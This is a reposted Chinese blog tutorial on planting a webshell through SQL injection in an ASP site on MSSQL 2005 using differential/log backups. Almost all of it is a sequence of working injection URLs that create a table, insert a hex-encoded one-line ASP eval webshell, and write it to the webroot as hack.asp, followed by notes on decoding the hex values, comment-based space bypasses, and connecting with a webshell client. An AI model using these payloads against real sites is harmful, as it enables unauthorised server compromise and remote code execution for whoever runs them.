Web渗透之mssql2005 差异备份getshell

admin 2021年4月27日04:32:08评论107 views字数 1883阅读6分16秒阅读模式

Web渗透之mssql2005 差异备份getshell

这里记录下mssql2005差异备份拿shell的过程

 

http://192.168.5.21:81/index.asp?id=1;alter/**/database/**/[asp_test]/**/set/**/recovery/**/full--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[asp_test]/**/to/**/disk=@d/**/with/**/init--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;;drop/**/table/**/[itpro]--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;create/**/table/**/[itpro]([a]/**/image)--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[asp_test]/**/to/**/disk=@d/**/with/**/init--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x45003A005C0077007700770072006F006F0074005C006100730070005F00730071006C0069005C006800610063006B002E00610073007000/**/backup/**/log/**/[asp_test]/**/to/**/disk=@d/**/with/**/init--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;drop/**/table/**/[itpro]--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[asp_test]/**/to/**/disk=@d/**/with/**/init--

Web渗透之mssql2005 差异备份getshell

Web渗透之mssql2005 差异备份getshell

菜刀连接即可

Web渗透之mssql2005 差异备份getshell



其中红色的“asp_test”是数据库名,这个要根据自己的情况来修改,

然后的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,


另外“0x45003A005C0077007700770072006F006F0074005C006100730070005F00730071006C0069005C006800610063006B002E00610073007000”为备份的路径“E:wwwrootasp_sqlihack.asp”,都是使用的SQL_En的格式,


另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。


转载自:卿先生博客地址:https://www.cnblogs.com/-qing-/p/10692824.html

没有专业运营团队,纯个人凭着空闲时间的学习,通过网络搜集与学习整理的资料记录并分享。

 如果觉得文章对你有帮助,请支持下点击右下角“在看”

Web渗透之mssql2005 差异备份getshell


本文始发于微信公众号(LemonSec):Web渗透之mssql2005 差异备份getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月27日04:32:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Web渗透之mssql2005 差异备份getshellhttps://cn-sec.com/archives/304604.html

发表评论

匿名网友 填写信息